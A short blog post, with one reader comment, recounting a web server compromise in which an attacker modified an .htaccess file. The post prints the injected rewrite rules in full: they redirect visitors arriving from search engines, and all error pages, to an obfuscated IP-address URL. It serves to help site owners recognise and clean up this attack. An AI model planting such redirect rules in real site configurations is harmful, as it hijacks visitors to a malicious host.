Exploit Search Engine Attack – bitrid

Recently one of my friend had his server attacked by a hacker, and they were able to modify the .htaccess file.
They had added several redirect conditions and ErrorDocument conditions.

He was really worried that AVG Antivirus was reporting the virus “Exploit Search Engine Attack – ~bitrid/” and was blocking access.
I really loved AVG Antivirus, and credit goes to their forum with a hint on some kind of redirect script.

The .htaccess had the following code which was causing this issue.
Probably if you come across any such issue it is better to look into the .htaccess files.
You might also check with the hosting company probably they may review the system security.

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http: // 1502998896/~bitrid/ [R=301,L]

ErrorDocument 401 http: //1502998896/~bitrid/
ErrorDocument 403 http: //1502998896/~bitrid/
ErrorDocument 404 http: //1502998896/~bitrid/
ErrorDocument 500 http: //1502998896/~bitrid/

I still wonder how the hacker could modify the .htaccess, and they never touched any othe files!!!
I just Hope no one else gets affected this way 😉

bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark

1 thought on “Exploit Search Engine Attack – bitrid”

  1. got hit by the same thing/evil-doer, and had a hard time locating the issue because no files in the pub dir had been altered. finally discovered the .htaccess in the home dir ABOVE the pub_html had been hacked… exact duplicate of your example… found it in the ftp logs. not nice… still not sure how they gained access to ftp site.

Comments are closed.